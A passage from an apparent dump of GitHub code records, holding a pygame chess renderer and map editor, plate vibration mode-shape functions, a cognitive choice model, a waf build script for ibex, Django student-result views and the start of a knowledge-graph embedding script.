position_y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (29, 161, 20), [x, y, Config.spotSize, Config.spotSize], Config.highlightOutline)\n\n def RenderPromoteWindow(self):\n \"Ventana de promoción\"\n if self.board.pieceToPromote:\n if self.board.pieceToPromote.color == 0:\n x = self.board.pieceToPromote.position.x * Config.spotSize + Config.horizontal_offset\n y = self.board.pieceToPromote.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (200, 200, 200), [x, y, Config.spotSize , Config.spotSize * 4])\n for i in range(4):\n piece = self.board.whitePromotions[i]\n self.screen.blit(piece.sprite, (x, i * Config.spotSize + Config.top_offset //2 ))\n bottomY = i * Config.spotSize - 1\n pygame.draw.rect(self.screen, (0, 0, 0), [x, bottomY, Config.spotSize , 2])\n else:\n x = self.board.pieceToPromote.position.x * Config.spotSize + Config.horizontal_offset\n y = (self.board.pieceToPromote.position.y - 3) * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (200, 200, 200), [x, y, Config.spotSize , Config.spotSize * 4])\n for i in range(4):\n piece = self.board.blackPromotions[i]\n self.screen.blit(piece.sprite, (x, (i+4) * Config.spotSize + Config.top_offset //2 ))\n bottomY = (i + 4) * Config.spotSize - 1\n pygame.draw.rect(self.screen, (0, 0, 0), [x, bottomY, Config.spotSize , 2])\n\n def DrawHighlight(self):\n \"Dibujar resaltados\"\n # Resaltado pieza seleccionada\n if self.selectedPiece != None:\n x = self.selectedPiece.position.x * Config.spotSize + Config.horizontal_offset\n y = self.selectedPiece.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (190, 200, 222), [x, y, Config.spotSize, Config.spotSize])\n if self.draggedPiece == None:\n self.screen.blit(self.selectedPiece.sprite, (x, y))\n\n # Dibujar los movimientos posibles de la pieza seleccionada\n if self.selectedPiece and self.selectedPieceMoves:\n for move in self.selectedPieceMoves:\n x = move.x * Config.spotSize + Config.horizontal_offset\n y = move.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (15, 140, 131), [x, y, Config.spotSize, Config.spotSize], Config.highlightOutline)\n\n # Dibujar las posibles capturas de la pieza seleccionada\n if self.selectedPiece and self.selectedPieceCaptures:\n for capturing in self.selectedPieceCaptures:\n x = capturing.x * Config.spotSize + Config.horizontal_offset\n y = capturing.y * Config.spotSize + Config.top_offset // 2\n self.screen.blit(ch, (x, y))\n\n # pygame.draw.rect(self.screen, (210, 211, 190), [x, y, Config.spotSize, Config.spotSize], Config.highlightOutline)\n # Dibujar la pieza levantada\n if self.draggedPiece != None:\n x = self.AdjustedMouse.x * Config.spotSize + Config.horizontal_offset\n y = self.AdjustedMouse.y * Config.spotSize + Config.top_offset // 2\n self.screen.blit(self.draggedPiece.sprite, (x, y))\n\n # Resalta si está en jaque\n # Rey blanco en jaque\n if self.board.checkWhiteKing:\n x = self.board.WhiteKing.position.x * Config.spotSize + Config.horizontal_offset\n y = self.board.WhiteKing.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (240, 111, 150), [x, y, Config.spotSize, Config.spotSize])\n self.screen.blit(self.board.WhiteKing.sprite, (x, y))\n # Rey negro en jaque\n elif self.board.checkBlackKing:\n x = self.board.BlackKing.position.x * Config.spotSize + Config.horizontal_offset\n y = self.board.BlackKing.position.y * Config.spotSize + Config.top_offset // 2\n 
pygame.draw.rect(self.screen, (240, 111, 150), [x, y, Config.spotSize, Config.spotSize])\n self.screen.blit(self.board.BlackKing.sprite, (x, y))\n\n if self.animateSpot >= Config.spotSize:\n self.DrawChessCoordinate()\n\n self.RenderPromoteWindow()\n\n def gameOverWindow(self):\n \"Pantalla de juego terminada\"\n if self.board.winner >= 0: # Si alguno de los jugadores ganó\n sounds.game_over_sound.play() # Activa el sonido de juego terminado\n else: # Si empataron\n sounds.stalemate_sound.play() # Activa el sonido de tablas\n time.sleep(2) # Duerme el programa durante 2 segundos\n self.screen.blit(self.gameOverBackground, (0, 0)) # Muestra la imagen de Game Over\n self.gameOverHeader.Draw() # Dibuja el texto de Game Over\n if self.board.winner == 0:\n self.winnerText.text = \"GANA EL BLANCO\"\n self.winnerText.color = (255, 255, 255)\n self.screen.blit(self.board.WhiteKing.sprite, (Config.width//2 - Config.spotSize // 2, Config.height//3))\n elif self.board.winner == 1:\n self.winnerText.text = \"GANA EL NEGRO\"\n self.winnerText.color = (0, 0, 0)\n self.screen.blit(self.board.BlackKing.sprite, (Config.width//2 - Config.spotSize // 2, Config.height//3))\n else:\n self.winnerText.text = \"EMPATE\"\n self.winnerText.color = (179, 196, 195)\n\n self.gameOverHeader.Draw()\n self.winnerText.Draw()\n pygame.display.update()\n time.sleep(5)\n self.board = Board()\n self.animateSpot = 1\n","repo_name":"Juanfe008-source/IA-Proyecto-2","sub_path":"screens/chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":19279,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10040170729","text":"\"\"\"\nMeloonatic Melons\nHPMRA Map Editor\nBy Harry Hitchen\n\nReport issues to\nmeloonatic.help@techie.com\n\nor send us a message at\nhttp://www.meloonaticmessage.btck.co.uk/MessageUs\n\"\"\"\n\n\nimport pygame, sys, math\nfrom scripts.Colors import *\nfrom scripts.textures import *\n\npygame.init()\n\ndef import_map(file):\n global tile_data\n with open(file, \"r\") as mapfile:\n map_data = mapfile.read()\n \n map_data = map_data.split(\"-\")\n\n map_size = map_data[len(map_data) - 1]\n map_data.remove(map_size)\n map_size = map_size.split(\",\")\n map_size[0] = int(map_size[0]) * Tiles.size\n map_size[1] = int(map_size[1]) * Tiles.size\n\n tiles = []\n\n for tile in range(len(map_data)):\n map_data[tile] = map_data[tile].replace(\"\\n\", \"\")\n tiles.append(map_data[tile].split(\":\"))\n for tile in tiles:\n tile[0] = tile[0].split(\",\")\n pos = tile[0]\n for p in pos:\n pos[pos.index(p)] = int(p)\n\n tiles[tiles.index(tile)] = [pos[0] * Tiles.size, pos[1] * Tiles.size, tile[1]]\n\n tile_data = tiles\n \n\n\ndef export_map(file):\n map_data = \"\"\n\n # Get Map Dimensions\n max_x = 0\n max_y = 0\n\n for t in tile_data:\n if t[0] > max_x:\n max_x = t[0]\n if t[1] > max_y:\n max_y = t[1]\n\n # Save Map Tiles\n for tile in tile_data:\n map_data = map_data + str(int(tile[0] / Tiles.size)) + \",\" + str(int(tile[1] / Tiles.size)) + \":\" + tile[2] + \"-\"\n \n\n # Save Map Dimensions\n map_data = map_data + str(int(max_x / Tiles.size)) + \",\" + str(int(max_y / Tiles.size))\n\n\n # Write Map File\n with open(file, \"w\") as mapfile:\n mapfile.write(map_data)\n\n\n\nwindow = pygame.display.set_mode((1280, 720), pygame.HWSURFACE)\npygame.display.set_caption(\"Map Editor\")\nclock = pygame.time.Clock()\n\n\ntxt_font = pygame.font.Font(\"C:\\\\Windows\\\\Fonts\\\\Verdana.ttf\", 20)\n\nmouse_pos = 0\nmouse_x, mouse_y = 0, 0\n\nmap_width, 
map_height = 8 * Tiles.size, 8 * Tiles.size\n\n\nselector = pygame.Surface((Tiles.size, Tiles.size), pygame.HWSURFACE|pygame.SRCALPHA)\nselector.fill(Color.with_alpha(100, Color.CornflowerBlue))\n\ntile_data = []\n\n\nbrush = \"5\"\n\n\n\n# Initialize Default Map\nfor x in range(0, map_width, Tiles.size):\n for y in range(0, map_height, Tiles.size):\n tile_data.append([x, y, \"1\"])\n\nprint(str(Tiles.Texture_tags))\n\n\nisRunning = True\n\n\nwhile isRunning:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n if event.type == pygame.KEYDOWN:\n\n\n # BRUSHES\n if event.key == pygame.K_F4:\n brush = \"r\"\n elif event.key == pygame.K_F1:\n selection = input(\"Brush Tag: \")\n brush = selection\n print(Tiles.Texture_tags[brush])\n\n #IMPORT MAP\n if event.key == pygame.K_F10:\n name = input(\"Map Name: \")\n import_map(name + \".map\")\n print(\"Map Loaded Successfully\")\n\n # SAVE MAP\n if event.key == pygame.K_F11:\n name = input(\"Map Name: \")\n export_map(name + \".map\")\n print(\"Map Saved Successfully!\")\n \n\n\n if event.type == pygame.MOUSEMOTION:\n mouse_pos = pygame.mouse.get_pos()\n mouse_x = math.floor(mouse_pos[0] / Tiles.size) * Tiles.size\n mouse_y = math.floor(mouse_pos[1] / Tiles.size) * Tiles.size\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n tile = [mouse_x, mouse_y, brush] # Keep this as a list\n\n # Is a tile already placed here?\n found = False\n for t in tile_data:\n if t[0] == tile[0] and t[1] == tile[1]:\n found = True\n break\n\n # If this tile space is empty\n if not found:\n if not brush == \"r\":\n tile_data.append(tile)\n\n # If this tile space is not empty\n else:\n # Are we using the rubber tool?\n if brush == \"r\":\n # Remove Tile\n for t in tile_data:\n if t[0] == tile[0] and t[1] == tile[1]:\n tile_data.remove(t)\n print(\"Tile Removed!\")\n\n else:\n # Sorry! 
A tile is already placed here!\n print(\"A tile is already placed here!\")\n \n\n\n\n # LOGIC\n\n\n\n\n # RENDER GRAPHICS\n\n window.fill(Color.Blue)\n\n\n # Draw Map\n for tile in tile_data:\n window.blit(Tiles.Texture_tags[tile[2]], (tile[0], tile[1]))\n\n # Draw Tile Highlighter (Selector)\n window.blit(selector, (mouse_x, mouse_y))\n \n \n\n pygame.display.update()\n\n clock.tick(60)\n\npygame.quit()\nsys.exit()\n","repo_name":"itsabugnotafeature/Raiders","sub_path":"map_editor.py","file_name":"map_editor.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10057879043","text":"\"\"\"\nFunctions for the analytic expressions of rectangular plates (mode frequencies and mode shapes),\nthe computation of sampling step and of all the mode shapes satisfying sampling condition and maximum temporal frequency\n\"\"\"\n\nimport math\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef fmode(m, n, Lx, Ly, C, th):\n \"\"\"\n Returns the frequency in Hz of mode (m,n) for a rectangular plate\n :param m: mode order along x dimension\n :param n: mode order along y dimension\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param C: speed of propagation\n :param th: thickness of plate\n :return: the temporal frequency in Hz for the mode (m, n) for a plate with given dimensions\n \"\"\"\n return 0.453 * C * th * ((m / Lx) ** 2 + (n / Ly) ** 2)\n\n\ndef cl(Eym, Rho, Nu):\n \"\"\"\n Returns the velocity of wave\n :param Eym: Young modulus\n :param Rho: density of material\n :param Nu: Poisson coefficient\n :return: propagation velocity\n \"\"\"\n return math.sqrt(Eym / (Rho * (1 - Nu ** 2)))\n\n\ndef z(x, y, m, n, Lx, Ly, A):\n \"\"\"\n Returns the mode shape of mode (m,n)\n :param x: x axis\n :param y: y axis\n :param m: mode order along x dimension\n :param n: mode order along y dimension\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param A: amplitude of mode shape (can be set to 1)\n :return: the function of x and y describing the mode shape (displacement along z direction)\n \"\"\"\n return np.sin(m * math.pi * x / Lx) * np.sin(n * math.pi * y / Ly)\n\n\ndef create_grid(Lx, Ly, d):\n \"\"\"\n Creates a grid of points given the two dimensions of the\n rectangular plate and the distance between two samples\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param d: sampling distance between two consecutive points\n :return: mesh of points\n \"\"\"\n x = np.arange(0, Lx + 0.0001, d)\n y = np.arange(0, Ly + 0.0001, d)\n x, y = np.meshgrid(x, y)\n return x, y\n\n\ndef plot_shape(shape):\n \"\"\"\n Plots the given mode shape as a 2D image\n :param shape: the mode shape to plot\n :return:\n \"\"\"\n plt.figure()\n plt.imshow(shape, cmap='coolwarm', origin='lower')\n plt.xlabel(\"[cm]\")\n plt.ylabel(\"[cm]\")\n plt.colorbar()\n\n\ndef modes_shapes(f_max, Lx, Ly, th, d, Eym, Rho, Nu):\n \"\"\"\n Given a plate's dimensions, finds all the modes that are below the given maximum temporal frequency and whose\n spatial frequency satisfies the sampling theorem for the given delta.\n Stores the mode order, its temporal freqeuncy and its mode shape\n :param f_max: the maximum temporal frequency\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param th: thickness of plate\n :param d: sampling step between two 
consecutive points\n :param Eym: Young modulus\n :param Rho: density if material\n :param Nu: Poisson coefficient\n :return: a dictionary whose keys are the couples (m,n) of mode orders and values a tuple containing\n the corresponding temporal frequency and the mode shape\n \"\"\"\n C = cl(Eym, Rho, Nu)\n modes = find_modes(f_max, Lx, Ly, C, th)\n res = {}\n x, y = create_grid(Lx, Ly, d)\n\n for i, f in modes.items():\n (m, n) = i\n\n kx = m * np.pi / Lx\n ky = n * np.pi / Ly\n k_max = max(kx, ky)\n k_s = 1.2*(2*k_max)\n\n if k_s < 2*np.pi/d:\n shape = z(x, y, m, n, Lx, Ly, A=1)\n res[(m, n)] = (f, shape)\n\n return res\n\n\ndef find_modes(f_max, Lx, Ly, C, th):\n \"\"\"\n Given the plate dimensions and a maximum frequency, finds all the modes that are below to that frequency\n :param f_max: maximum temporal frequency to reach\n :param Lx: length along x dimension\n :param Ly: length along y dimension\n :param C: speed propagation\n :param th: thickness of plate\n :return: a dictionary whose keys are the couples of mode orders (m, n)\n and values the corresponding temporal frequencies\n \"\"\"\n modes = {}\n\n for m in range(1, 1000):\n f = fmode(m, 1, Lx, Ly, C, th)\n if f > f_max:\n break\n for n in range(1, 1000):\n f = fmode(m, n, Lx, Ly, C, th)\n if f > f_max:\n break\n else:\n modes[m, n] = f\n\n return modes\n\n\ndef delta_sampling_max(f_max, Lx, Ly, C, th):\n \"\"\"\n Finds the maximum delta needed to sample all mode shapes up to a given maximum frequency,\n given the plate dimensions\n :param f_max: maximum temporal frequency in Hz to reach\n :param Lx: length along x dimension\n :param Ly: length along y dimension\n :param C: speed of propagation\n :param th: thickness of plate\n :return: delta needed to sample the mode shape with maximum frequency (therefore all mode shapes up to\n that frequency\n \"\"\"\n modes = find_modes(f_max, Lx, Ly, C, th)\n f = 0\n for i in modes:\n if modes[i] > f:\n f = modes[i]\n (m, n) = i\n\n d = delta_sampling_mn(Lx, Ly, m, n)\n return d\n\n\ndef delta_sampling_mn(Lx, Ly, m, n):\n \"\"\"\n Computes the maximum delta needed to sample mode shape of order (m,n) given the plate dimensions\n Modes m and n determine two spatial frequencies kx, ky along the two axes: we need to make sure that the spatial\n sampling frequency (and therefore sampling delta) satisfies the Nyquist theorem with kmax = max(kx, ky)\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param m: mode order along x dimension\n :param n: mode order along y dimension\n :return:\n \"\"\"\n kx = m * np.pi / Lx\n ky = n * np.pi / Ly\n kmax = max(kx, ky)\n ks = 1.2 * (2 * kmax)\n d = 2 * np.pi / ks\n return d\n\n\nlx = 0.8\nly = 0.8\n\nnu = 0.3\nE = 2.1e11\nrho = 7850\nh = 0.002\ndelta = 0.02\n\nc = cl(E, rho, nu)\n\nfmax = 2000\nfind = find_modes(fmax, lx, ly, c, h)\nmod = modes_shapes(fmax, lx, ly, h, delta, E, rho, nu)\n# to get list of modes: sorted(mod)\n# to plot a certain mode shape: plot_shape(mod[m,n][1])\n","repo_name":"polimi-ispl/modal-shape-interpolation-cnn","sub_path":"src/modeshapesPlate.py","file_name":"modeshapesPlate.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26189365189","text":"from organdiae import *\nbs('trio')\ng = DiGraph()\nfor x in ['violin','viola','cello', 'plays','trio'] :\n\tng(x, 
name=True)\n\ng.ae(violin,trio,sb(plays))\ng.ae(viola,trio,sb(plays))\ng.ae(cello,trio,sb(plays))\ngv(g,path='ratherLimited')\nimport random\ndef rand_collect_length(l, f = lambda out, x : x, i=True, overshoot=True) :\n\tout = []\n\tsum = 0.0\n\twhile sum < l :\n\t\tv = f(out,random.random())\n\t\tif i : v = round(v)\n\t\tsum += v\n\t\tout.append(v)\n\tif not overshoot : out = out[:-1]\n\treturn out\n\ndef rand_collect_times(t, f = lambda out, x : x, i=True) :\n\tout = []\n\tfor x in range(t) :\n\t\tv = f(out,random.random())\n\t\tif i : v = round(v)\n\t\tout.append(v)\n\treturn out\n\n","repo_name":"mikesol/organdiae","sub_path":"doc/_downloads/deadline2.rst.py","file_name":"deadline2.rst.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19152970857","text":"# attempted implementation of the zhu et al (2017) model.\nimport numpy as np\nimport random\nimport utilities as utl\n\n# Apologies for this very non-object oriented way of doing things...\ndef getDetails():\n return({'name':'mZhu',\n 'authname':'Zhu',\n 'parmnames':['gamma','w0','w1','beta']\n })\n\ndef parmxform(parms,direction=1):\n #Zhu model log transforms only gamma and beta parms\n parms = np.array(parms)\n parms[0] = utl.logit_scale(parms[0], min=0, max=1, direction=direction)#utl.log_scale(parms[0],direction=direction)\n #XIAN! This is too hacky, please find a way to deal with it??\n if len(parms)>3:\n parms[3] = utl.log_scale(parms[3],direction=direction) \n return(parms)\n\n#For simplified model, use equations 7 to 12. Treat them as the values of each action\n# because we can treat Q(S*|uncued) as zero (because the authors say so)\ndef Qbar(w,gamma,delay,r):\n return (w[0]-w[1]) * (gamma**delay) * abs(r[0]+r[1])/ 2\n\ndef choice(Qi,Qn,beta):\n #Luce choice rule\n #p_inform = np.exp(beta*Qi) / (np.exp(beta*Qi) + np.exp(beta*Qn))\n p_inform = 1./(1 + np.exp(beta*(Qn-Qi)))\n return p_inform\n\n\ndef minthis(freeparms,data,task,fixVal,ivs=['delay'],minfun='negll',randseed=None,returnPreds = False):\n #Script to run some function to minimise\n #Free parms are in the order:\n #[gamma,w0,w1,beta]\n #Reverse-transform parms\n freeparms = parmxform(freeparms,direction=-1)\n #freeparms = utl.log_scale(freeparms,direction = -1)\n\n #Insert freeparm values into vector of all parms\n if fixVal==None:\n fixVal = [np.nan] * len(freeparms)\n fixVal = np.array(fixVal)\n freeIdx = np.isnan(fixVal)\n fixVal[freeIdx] = freeparms\n parms = fixVal\n\n # unpack learner parameters\n learner = dict(\n gamma = parms[0], # intertemporal discount parameter\n w0 = parms[1], #weight of better outcome\n w1 = parms[2], #weight of worse cue\n beta = parms[3], #Luce determinism\n )\n\n #Seed RNG if it's not None\n if not randseed is None:\n random.seed(randseed)\n\n # #Identify the IV\n # ivSet = iv + 'Set'\n \n # #Preallocate vector of predictions \n # preds = np.zeros(len(task[ivSet]))#matrix(0,1,length(delays))\n\n #Allow for multiple ivs -- have iv be a list of strings\n ivSet = []\n for iv in ivs:\n ivSet += [iv + 'Set']\n #delays = task['delays']\n nLevels = len(task[ivSet[0]])\n preds = np.zeros(nLevels)\n\n #for li,level in enumerate(task[ivSet]):\n for li in range(nLevels):\n for iv in ivs:\n task[iv] = task[iv + 'Set'][li] \n #task[iv] = level\n #Get Qbar for the better outcome\n w = [learner['w0'],learner['w1']]\n rs = [task['RA'],task['RB']]\n Qb = Qbar(w,learner['gamma'],task['delay'],rs)\n #Compute probability of choice\n preds[li] = 
choice(Qb,0,learner['beta'])\n if minfun == 'rmsd':\n out = np.sqrt(np.mean((preds-np.array(data))**2))\n elif minfun == 'negll': \n out = sum(utl.binoNegLL(preds,data['count_inform'],data['count_total']))\n elif minfun == None:\n out = None\n if not returnPreds:\n return(out)\n else:\n return(out,preds)\n","repo_name":"shixianliew/infoseekDelayDist","sub_path":"model_kernels/ape.py","file_name":"ape.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32609760311","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nimport ibexutils\nimport shutil, os\nfrom waflib import TaskGen\n\ndef configure (conf):\n\t# Add all subdirectories of the 'src' directory in srcnode and bldnode in the\n\t# includes\n\tsubdir = ibexutils.get_dirlist (conf.path)\n\tsnode = conf.srcnode.make_node (\"src\")\n\tbnode = conf.bldnode.make_node (\"src\")\n\tfor p in subdir:\n\t\tconf.env.append_unique (\"INCLUDES_IBEX\", snode.make_node(p).abspath())\n\t\tconf.env.append_unique (\"INCLUDES_IBEX\", bnode.make_node(p).abspath())\n\n\t# Set env variable containing the list of all ibex source files (by looking\n\t# recursively for all files ending with '.cpp' or '.yc' o '.l')\n\tibex_src = conf.path.ant_glob (\"**/*.(cpp|yc|l) **/*.(cpp|yc|l).in\",\n\t excl = \"bin/**\")\n\tibex_src =[ f.path_from (conf.path) for f in ibex_src ]\n\tconf.env.append_unique ('IBEX_SRC', ibex_src)\n\n\t# Set env variable containing the list of all ibex headers (by looking\n\t# recursively for all files starting with 'ibex_' and ending with '.h' or with\n\t# '.h.in')\n\tibex_hdr = conf.path.ant_glob (\"**/ibex_*.h **/ibex_*.h.in\",\n\t excl = \"ibex_Setting.h.in\")\n\tibex_hdr =[ f.path_from (conf.path) for f in ibex_hdr ]\n\tconf.env.append_unique ('IBEX_HDR', ibex_hdr)\n\n\t# To fix Windows compilation problem (strdup with std=c++11, see issue #287)\n\tconf.check_cxx (cxxflags=\"-U__STRICT_ANSI__\", uselib_store=\"IBEX\")\n\n # Handle operators\n\tconf.recurse (\"operators\")\n\ndef build (bld):\n\t# Do substitution in files ending with .in\n\tfor f in bld.env.IBEX_SRC + bld.env.IBEX_HDR:\n\t\tif f.endswith(\".in\"):\n\t\t\tfnode = bld.path.find_node (f)\n\t\t\tt = fnode.change_ext (\"\", \".in\"),\n\t\t\ttsk = bld (features = \"subst\", source = fnode, target = t)\n\n\t# c++ compilation of main lib\n\ttg_ibex = (bld.shlib if bld.env.ENABLE_SHARED else bld.stlib) (\n\t\ttarget = \"ibex\",\n\t\tuse = [ \"IBEX\", \"ITV_LIB\", \"LP_LIB\" ] + bld.env.IBEX_PLUGIN_USE_LIST,\n\t\tsource = [ f[:-3] if f.endswith(\".in\") else f for f in bld.env.IBEX_SRC ],\n\t\tinstall_path = bld.env.LIBDIR,\n\t)\n\n\t# install headers\n\tibex_hdr = [ f[:-3] if f.endswith(\".in\") else f for f in bld.env.IBEX_HDR ]\n\tbld.install_files (bld.env.INCDIR_HDR, ibex_hdr)\n\n # build ibexsolve\n\tbld.program (\n\t\ttarget = \"ibexsolve\",\n\t\tuse = [ \"ibex\" ],\n\t\tsource = bld.path.ant_glob (\"bin/ibexsolve.cpp\"),\n\t\tinstall_path = bld.env.BINDIR,\n\t\t)\n\n # build ibexopt\n\tbld.program (\n\t\ttarget = \"ibexopt\",\n\t\tuse = [ \"ibex\" ],\n\t\tsource = bld.path.ant_glob (\"bin/ibexopt.cpp\"),\n\t\tinstall_path = bld.env.BINDIR,\n\t\t)\n","repo_name":"ibex-team/ibex-lib","sub_path":"src/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"19702134251","text":"import re\ndef get_jet_eff_color(sample):\n custom_colors = [\n 
('Sherpa.*LeptHad', 'red'),\n ('Sherpa.*Wjets', 'blue'),\n ('Sherpa.*Zjets', 'black'),\n ('McAt', 'purple'),\n ('Powheg', 'green'),\n ]\n for sample_re, color in custom_colors:\n if re.compile(sample_re).search(sample):\n return color\n","repo_name":"dguest/susy-analysis","sub_path":"python/scharm/performance/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24831958907","text":"from builtins import str\nfrom builtins import object\n\nfrom qgis.PyQt.QtCore import QSettings\nfrom qgis.core import *\nfrom .db_connection_cfg import DbConnectionCfg\nimport time\nimport socket\n\n\nclass DbConnections(object):\n\n def __init__(self):\n self._dbs = {} # Map\n self._dbs_refreshed = False\n\n def add_from_json(self, db):\n self._dbs[db['name']] = DbConnectionCfg(\n db['host'], db['port'], db['name'], db['username'], db['password'])\n\n def count(self):\n return len(self._dbs)\n\n def iteritems(self):\n return iter(list(self._dbs.items()))\n\n def db(self, dbname):\n return self._dbs[str(dbname)]\n \n \n def db_size(self):\n usedSpace = 0\n self.numDbs = len(list(self._dbs.keys()))\n for db in list(self._dbs.keys()):\n try:\n conn = self.db(db).psycopg_connection()\n except:\n continue\n cursor = conn.cursor()\n sql = \"SELECT pg_database_size('\" + str(db) + \"')\"\n cursor.execute(sql)\n usedSpace += int(cursor.fetchone()[0])\n cursor.close()\n conn.close\n\n # Used space in MB\n usedSpace /= 1024 * 1024\n return usedSpace\n\n def refreshed(self):\n return self._dbs_refreshed\n \n def refresh(self, user):\n cloud_connections_key = u\"/qgiscloud/connections/%s\" % user\n settings = QSettings()\n\n cloud_dbs_from_server = list(self._dbs.keys())\n stored_connections = settings.value(cloud_connections_key) or []\n cloud_dbs_from_settings = [str(conn) for conn in stored_connections]\n\n # remove obsolete connections\n for db_name in (set(cloud_dbs_from_settings) - set(cloud_dbs_from_server)):\n for connection in DbConnectionCfg.get_cloud_db_connections(db_name):\n DbConnectionCfg.remove_connection(connection)\n\n # add missing or changed connections\n for db_name in cloud_dbs_from_server:\n cfg = self.db(db_name)\n if len(DbConnectionCfg.get_cloud_db_connections(db_name)) == 0 or \\\n cfg.changed:\n cfg.store_connection()\n\n # store cloud db names in settings\n if len(cloud_dbs_from_server) > 0:\n settings.setValue(cloud_connections_key, cloud_dbs_from_server)\n else:\n settings.remove(cloud_connections_key)\n\n self._dbs_refreshed = True\n\n def cloud_layer_uri(self, db_name, table_name, geom_column):\n uri = None\n # find db connection and create uri\n connections = DbConnectionCfg.get_cloud_db_connections(db_name)\n if len(connections) > 0:\n conn = DbConnectionCfg.from_settings(connections[0])\n uri = conn.data_source_uri()\n uri.setDataSource(\"\", table_name, geom_column)\n return uri\n\n def isPortOpen(self, db_name):\n uri = self.cloud_layer_uri(db_name, \"\", \"\")\n if not uri.port():\n return False\n host = str(uri.host())\n port = int(uri.port())\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect((host, port))\n s.shutdown(2)\n return True\n except:\n return False\n\n # Wait until cloud database is available (creation is asynchronous)\n @staticmethod\n def wait_for_db(db, timeout=3, retries=5, sleeptime=3):\n ok = False\n while not ok and retries > 0:\n try:\n connection = db.psycopg_connection(timeout)\n connection.close()\n ok = 
True\n except Exception: # as err:\n retries -= 1\n if retries == 0:\n raise\n else:\n time.sleep(sleeptime)\n","repo_name":"tkdnsk0070/qgis-cloud-plugin","sub_path":"qgiscloud/db_connections.py","file_name":"db_connections.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"34274504509","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.models import auth\nfrom .forms import LoginForm\nfrom .models import Student,Subject,Mark\nfrom django.db.models import Count,Sum,Avg,Max\n\n\ndef home(request):\n \n return render(request,'home.html')\n\n\ndef login_view(request):\n\n if request.method == 'POST':\n print(request)\n username = request.POST['username']\n password = request.POST['password']\n \n user = auth.authenticate(username=username,password=password)\n \n if user is not None:\n auth.login(request,user)\n \n return redirect('/home/')\n else: \n messages.info(request,'invalid credentials')\n \n return redirect('login')\n \n else:\n form = LoginForm()\n return render(request,'login.html',{\"form\":form})\n\n\ndef logout_view(request):\n auth.logout(request)\n return render(request,'logout.html')\n\n\ndef result_view(request):\n \n user = request.user.is_authenticated\n \n if user :\n a = str(request.user)\n student = Student.objects.get(student_id=a)\n mark = Mark.objects.filter(student_id=student) \n total = Mark.objects.filter(student_id=student).aggregate(Avg('marks'))\n \n context ={\n \"student\":student,\n \"mark\":mark,\n \"total\": total, \n } \n return render(request,'result.html',context)\n \n \n form = LoginForm() \n return render(request,'login.html',{\"form\":form})\n\ndef topper_view(request):\n \n user = request.user.is_authenticated\n \n if user:\n student = Student.objects.all()\n lis=[]\n for stu in student:\n mark = Mark.objects.filter(student_id=stu).aggregate(Avg('marks'))\n a = (mark['marks__avg'],stu)\n lis.append(a)\n lis.sort(reverse=True)\n topper = lis[0][1]\n aggregate = lis[0][0]\n topper_mark = Mark.objects.filter(student_id=topper)\n \n \n context ={\n \"student\":topper,\n \"topper\" : topper_mark,\n \"aggregate\" : aggregate \n }\n \n return render(request,'topper_page.html',context)\n \n \n form = LoginForm() \n return render(request,'login.html',{\"form\":form}) \n \n\n\n\n\n ","repo_name":"yashrajvanshi/RegWeb","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3375327303","text":"\"\"\"The main script for training or evaluating kg embedding models.\"\"\"\n\nfrom link_prediction import run_train, run_test\nfrom constants import BASE_CONFIG, MODELS\nfrom torch import cuda, manual_seed, device as torch_device\nfrom numpy.random import seed\nimport time\n\n# Parameters\nSEED = False # use fixed seed (0) for numpy and torch random modules\nTRAIN_MODEL = False # train a new model or load a trained model\nSAVE_RESULTS = False # save trained model and/or model evaluation\nALIGN_MODE = True # use aligned datasets or pre-trained embeddings like DBP15k\n\n# Variables required for training\ndataset = \"en_fr0\" # dataset name or id\nalign_data_train = 1 # 0 for DBP15k, 1 for WK3l-15k (only for align mode)\nmodel_type_train = 0 # 0 for TransE, 1 for RotatE (only for align mode)\n\n# Variables required for testing\nmodel_name = \"fr_en0\" # name of the model 
